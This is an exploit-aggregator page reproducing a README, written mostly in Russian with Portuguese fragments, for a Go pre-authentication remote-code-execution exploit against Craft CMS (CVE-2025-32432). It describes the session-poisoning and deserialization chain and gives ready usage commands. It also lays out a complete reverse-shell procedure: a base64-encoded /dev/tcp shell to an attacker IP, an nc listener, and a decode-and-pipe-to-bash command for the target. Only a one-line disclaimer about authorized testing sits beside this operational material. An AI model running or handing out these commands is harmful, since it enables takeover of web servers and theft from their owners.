Sploitus

Exploit for CVE-2025-32432

kitploit · 2026-08-24

Exploit Code

MARKDOWN68 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HELTONPOJO-CVE-2025-32432
# CVE-2025-32432 — Craft CMS Pre-Auth RCE

Эксплойт для удалённого выполнения кода без аутентификации в Craft CMS, написанный на Go.  
Вдохновлён оригинальной работой c0gnit00.

## Как это работает

  1. Получает PHP-сессию и CSRF-токен через `GET /admin/login`
  2. Отравляет файл PHP-сессии, внедряя PHP-код в строку запроса
  3. Запускает десериализацию через `assets/generate-transform`, чтобы подключить и выполнить отравленный файл



## Использование

root@kitploit:~
    
    
    go run main.go -u <url> -c <comando> 
    

Flag| Описание| Обязательный  
---|---|---  
`-u`| Целевой URL (например: `http://target.com`)| Да  
`-c`| Команда для выполнения (например: `id`, `whoami`)| Да  
  
## Пример

root@kitploit:~
    
    
    # Sem Asset ID (brute-force automático)
    go run main.go -u http://target.com -c whoami
    
    

## Reverse Shell

**1\. Сгенерируйте payload в base64 с вашим IP и портом:**

root@kitploit:~
    
    
    echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
    

**2\. Запустите listener:**

root@kitploit:~
    
    
    nc -lvnp 4444
    

**3\. Запустите эксплойт с payload:**

root@kitploit:~
    
    
    go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
    

> Замените значение base64 на сгенерированное в шаге 1 с вашим реальным IP.

## Предупреждение

Для использования исключительно в авторизованных средах и контролируемых тестах безопасности.